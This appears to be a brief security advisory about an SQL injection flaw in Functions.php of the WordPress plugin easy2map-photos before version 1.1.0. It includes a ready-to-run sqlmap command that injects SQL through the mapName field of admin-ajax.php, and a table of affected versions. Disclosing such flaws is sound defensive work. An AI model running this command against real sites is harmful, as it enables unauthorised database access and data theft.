The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input.
sqlmap -u ‘http://www.example.com/wp-admin/admin-ajax.php’ --data=“mapID=11&mapName;='+or+1%3D%3D1%3B&action;=e2m_img_save_map_name” --cookie=COOKIEHERE --level=5 --risk=3
CPE | Name | Operator | Version |
---|---|---|---|
easy2map-photos | lt | 1.1.0 |